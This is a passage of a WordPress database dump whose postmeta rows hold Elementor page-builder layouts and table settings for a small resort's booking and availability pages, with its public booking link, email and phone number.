833,'_wp_page_template','default'),(2537,833,'_elementor_edit_mode','builder'),(2538,833,'_elementor_template_type','post'),(2539,833,'_elementor_version','2.5.16'),(2541,92,'_elementor_edit_mode','builder'),(2542,92,'_elementor_template_type','post'),(2543,92,'_elementor_version','2.5.16'),(2544,92,'_elementor_data','[{\"id\":\"4ace75b7\",\"elType\":\"section\",\"settings\":{\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"c21a27e\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"5bc00d7\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"b3833c5\"}]},\"elements\":[{\"id\":\"20213244\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"8ab063f\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"130fa4c\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"25428d7\"}]},\"elements\":[{\"id\":\"6c57cfa9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><a href=\\\"http:\\/\\/ashbyresort.com\\/calendar\\/\\\">Click here to book online<\\/a><\\/p><p>[wpforms id=\\\"613\\\"]<\\/p><p>Email us at theashbyresort@gmail.com or call us at 218-747-2959<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2545,834,'_wp_page_template','default'),(2546,834,'_elementor_edit_mode','builder'),(2547,834,'_elementor_template_type','post'),(2548,834,'_elementor_version','2.5.16'),(2549,834,'_elementor_data','[{\"id\":\"4ace75b7\",\"elType\":\"section\",\"settings\":{\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"c21a27e\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"5bc00d7\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"b3833c5\"}]},\"elements\":[{\"id\":\"20213244\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"8ab063f\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"130fa4c\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"25428d7\"}]},\"elements\":[{\"id\":\"6c57cfa9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><a href=\\\"http:\\/\\/ashbyresort.com\\/calendar\\/\\\">Click here to book online<\\/a><\\/p><p>[wpforms id=\\\"613\\\"]<\\/p><p>Email us at theashbyresort@gmail.com or call us at 218-747-2959<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2552,835,'vantage_panels_no_legacy','true'),(2553,835,'_tablepress_table_options','{\"last_editor\":3,\"table_head\":true,\"table_foot\":false,\"alternating_row_colors\":true,\"row_hover\":true,\"print_name\":false,\"print_name_position\":\"above\",\"print_description\":false,\"print_description_position\":\"below\",\"extra_css_classes\":\"\",\"use_datatables\":true,\"datatables_sort\":false,\"datatables_filter\":true,\"datatables_paginate\":true,\"datatables_lengthchange\":true,\"datatables_paginate_entries\":20,\"datatables_info\":true,\"datatables_scrollx\":false,\"datatables_custom_commands\":\"\"}'),(2554,835,'_tablepress_table_visibility','{\"rows\":[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1],\"columns\":[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1]}'),(2555,837,'vantage_panels_no_legacy','true'),(2556,837,'_edit_lock','1563724033:1'),(2557,837,'_edit_last','1'),(2558,837,'_elementor_edit_mode','builder'),(2559,837,'_elementor_template_type','post'),(2560,837,'_elementor_version','2.5.16'),(2561,837,'_wp_page_template','default'),(2576,837,'vantage_metaslider_slider',''),(2577,837,'vantage_metaslider_slider_stretch','1'),(2578,837,'vantage_menu_icon',''),(2579,837,'siteorigin_page_settings','a:7:{s:6:\"layout\";s:7:\"default\";s:10:\"page_title\";b:1;s:15:\"masthead_margin\";b:1;s:13:\"footer_margin\";b:1;s:14:\"featured_image\";b:0;s:13:\"hide_masthead\";b:0;s:19:\"hide_footer_widgets\";b:0;}'),(2580,837,'_yoast_wpseo_content_score','30'),(2581,839,'_elementor_edit_mode','builder'),(2582,839,'_elementor_template_type','post'),(2583,839,'_elementor_version','2.5.16'),(2584,839,'_wp_page_template','default'),(2585,837,'_elementor_data','[{\"id\":\"4adec0b\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"70747d3\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"d049168\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"c31cdc6\"}]},\"elements\":[{\"id\":\"bfba0b0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":64.607,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"8dc92bc\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"61a4004\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"b84ac64\"}]},\"elements\":[{\"id\":\"c0628bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>X = Booked Dates in Ashby Resort Calendar<br \\/><\\/strong><\\/h4>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"99be00f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":35.393,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"7460108\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"ef75090\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"d9d3424\"}]},\"elements\":[{\"id\":\"82fe7ed\",\"elType\":\"widget\",\"settings\":{\"text\":\"Request a Booking\",\"link\":{\"url\":\"http:\\/\\/ashbyresort.com\\/calendar\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#a5463b\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"90a8733\",\"elType\":\"section\",\"settings\":{\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"630c297\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"d1b6305\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"35bf2b4\"}]},\"elements\":[{\"id\":\"736fef9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"8f92b24\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"d513b8a\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"74df4fb\"}]},\"elements\":[{\"id\":\"b62ea51\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Book your stay by calling (218) 747-2959. The calendar below is updated to show availability.<\\/p><p>You can also send a request for booking\\u00a0 online by clicking Request a Booking above.<br \\/>We will call you to confirm Reservation.<br \\/>Remember that a deposit is required before a booking can be confirmed. <br \\/>Of course if you would prefer you can just call us to set up a reservation at (218) 747- 2959.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cc7f02f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"0407491\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"fa94346\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"695a7cc\"}]},\"elements\":[{\"id\":\"cc62ce7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":80,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"2a1cfd1\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"d37f553\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"ff5cdae\"}]},\"elements\":[{\"id\":\"0adf302\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[table id=3 \\/]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false},{\"id\":\"d5cd555\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":20,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"9418820\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"0adff2e\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"8b812cc\"}]},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(2586,840,'_elementor_edit_mode','builder'),(2587,840,'_elementor_template_type','post'),(2588,840,'_elementor_version','2.5.16'),(2589,840,'_wp_page_template','default'),(2590,840,'_elementor_data','[{\"id\":\"cc7f02f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"0407491\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"fa94346\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"695a7cc\"}]},\"elements\":[{\"id\":\"cc62ce7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":80,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"2a1cfd1\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"d37f553\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"ff5cdae\"}]},\"elements\":[{\"id\":\"0adf302\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[table id=3 \\/]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false},{\"id\":\"d5cd555\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":20,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"9418820\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"0adff2e\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"8b812cc\"}]},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(2593,842,'_elementor_edit_mode','builder'),(2594,842,'_elementor_template_type','post'),(2595,842,'_elementor_version','2.5.16'),(2596,842,'_wp_page_template','default'),(2597,842,'_elementor_data','[{\"id\":\"4adec0b\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"70747d3\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"d049168\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"c31cdc6\"}]},\"elements\":[{\"id\":\"bfba0b0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":75.602,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"8dc92bc\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"61a4004\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"b84ac64\"}]},\"elements\":[{\"id\":\"c0628bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Open dates for each of our units<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"99be00f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":24.398,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"7460108\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"ef75090\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"d9d3424\"}]},\"elements\":[{\"id\":\"82fe7ed\",\"elType\":\"widget\",\"settings\":{\"text\":\"Book your vacation\",\"align\":\"center\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#a5463b\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cc7f02f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"0407491\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"fa94346\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"695a7cc\"}]},\"elements\":[{\"id\":\"cc62ce7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":80,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"2a1cfd1\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"d37f553\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"ff5cdae\"}]},\"elements\":[{\"id\":\"0adf302\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[table id=3 \\/]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false},{\"id\":\"d5cd555\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":20,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"9418820\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"0adff2e\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"8b812cc\"}]},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(2600,843,'_elementor_edit_mode','builder'),(2601,843,'_elementor_template_type','post'),(2602,843,'_elementor_version','2.5.16'),(2603,843,'_wp_page_template','default'),(2604,843,'_elementor_data','[{\"id\":\"4adec0b\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"70747d3\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"d049168\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"c31cdc6\"}]},\"elements\":[{\"id\":\"bfba0b0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":75.602,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"8dc92bc\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"61a4004\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"b84ac64\"}]},\"elements\":[{\"id\":\"c0628bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Open dates for each of our units<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"99be00f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":24.398,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"7460108\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"ef75090\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"d9d3424\"}]},\"elements\":[{\"id\":\"82fe7ed\",\"elType\":\"widget\",\"settings\":{\"text\":\"Book your vacation\",\"link\":{\"url\":\"http:\\/\\/ashbyresort.com\\/calendar\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#a5463b\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cc7f02f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"0407491\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"fa94346\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"695a7cc\"}]},\"elements\":[{\"id\":\"cc62ce7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":80,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"2a1cfd1\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"d37f553\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"ff5cdae\"}]},\"elements\":[{\"id\":\"0adf302\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[table id=3 \\/]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false},{\"id\":\"d5cd555\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":20,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"9418820\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"0adff2e\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"8b812cc\"}]},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(2607,844,'_elementor_edit_mode','builder'),(2608,844,'_elementor_template_type','post'),(2609,844,'_elementor_version','2.5.16'),(2610,844,'_wp_page_template','default'),(2611,844,'_elementor_data','[{\"id\":\"4adec0b\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"70747d3\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"d049168\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"c31cdc6\"}]},\"elements\":[{\"id\":\"bfba0b0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":75.602,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"8dc92bc\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"61a4004\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"b84ac64\"}]},\"elements\":[{\"id\":\"c0628bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Open dates for each of our vacation spots<br \\/><\\/strong><\\/h4>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"99be00f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":24.398,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"7460108\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"ef75090\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"d9d3424\"}]},\"elements\":[{\"id\":\"82fe7ed\",\"elType\":\"widget\",\"settings\":{\"text\":\"Book your vacation\",\"link\":{\"url\":\"http:\\/\\/ashbyresort.com\\/calendar\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#a5463b\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cc7f02f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"0407491\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"fa94346\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"695a7cc\"}]},\"elements\":[{\"id\":\"cc62ce7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":80,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"2a1cfd1\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"d37f553\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"ff5cdae\"}]},\"elements\":[{\"id\":\"0adf302\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[table id=3 \\/]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false},{\"id\":\"d5cd555\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":20,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"9418820\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"0adff2e\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"8b812cc\"}]},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(2619,846,'_elementor_edit_mode','builder'),(2620,846,'_elementor_template_type','post'),(2621,846,'_elementor_version','2.5.16'),(2622,846,'_wp_page_template','default'),(2623,846,'_elementor_data','[{\"id\":\"4adec0b\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"70747d3\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"d049168\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"c31cdc6\"}]},\"elements\":[{\"id\":\"bfba0b0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":64.607,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"8dc92bc\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"61a4004\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"b84ac64\"}]},\"elements\":[{\"id\":\"c0628bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Open dates listed for each of our vacation spots<br \\/><\\/strong><\\/h4>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"99be00f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":35.393,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"7460108\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"ef75090\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"d9d3424\"}]},\"elements\":[{\"id\":\"82fe7ed\",\"elType\":\"widget\",\"settings\":{\"text\":\"Book your vacation\",\"link\":{\"url\":\"http:\\/\\/ashbyresort.com\\/calendar\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#a5463b\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cc7f02f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"0407491\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"fa94346\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"695a7cc\"}]},\"elements\":[{\"id\":\"cc62ce7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":80,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"2a1cfd1\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"d37f553\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"ff5cdae\"}]},\"elements\":[{\"id\":\"0adf302\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[table id=3 \\/]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false},{\"id\":\"d5cd555\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":20,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"9418820\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"0adff2e\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"8b812cc\"}]},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(2626,847,'_elementor_edit_mode','builder'),(2627,847,'_elementor_template_type','post'),(2628,847,'_elementor_version','2.5.16'),(2629,847,'_wp_page_template','default'),(2630,847,'_elementor_data','[{\"id\":\"4adec0b\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"70747d3\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"d049168\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"c31cdc6\"}]},\"elements\":[{\"id\":\"bfba0b0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":64.607,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"8dc92bc\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"61a4004\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"b84ac64\"}]},\"elements\":[{\"id\":\"c0628bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>X = Booked Dates in Upcoming Vacation Calendar<br \\/><\\/strong><\\/h4>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"99be00f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":35.393,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"7460108\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"ef75090\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"d9d3424\"}]},\"elements\":[{\"id\":\"82fe7ed\",\"elType\":\"widget\",\"settings\":{\"text\":\"Book your vacation\",\"link\":{\"url\":\"http:\\/\\/ashbyresort.com\\/calendar\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#a5463b\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cc7f02f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"0407491\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"fa94346\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"695a7cc\"}]},\"elements\":[{\"id\":\"cc62ce7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":80,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"2a1cfd1\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"d37f553\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"ff5cdae\"}]},\"elements\":[{\"id\":\"0adf302\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[table id=3 \\/]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false},{\"id\":\"d5cd555\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":20,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"9418820\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"0adff2e\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"8b812cc\"}]},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(2633,848,'_elementor_edit_mode','builder'),(2634,848,'_elementor_template_type','post'),(2635,848,'_elementor_version','2.5.16'),(2636,848,'_wp_page_template','default'),(2637,848,'_elementor_data','[{\"id\":\"4adec0b\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"70747d3\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"d049168\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"c31cdc6\"}]},\"elements\":[{\"id\":\"bfba0b0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":64.607,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_g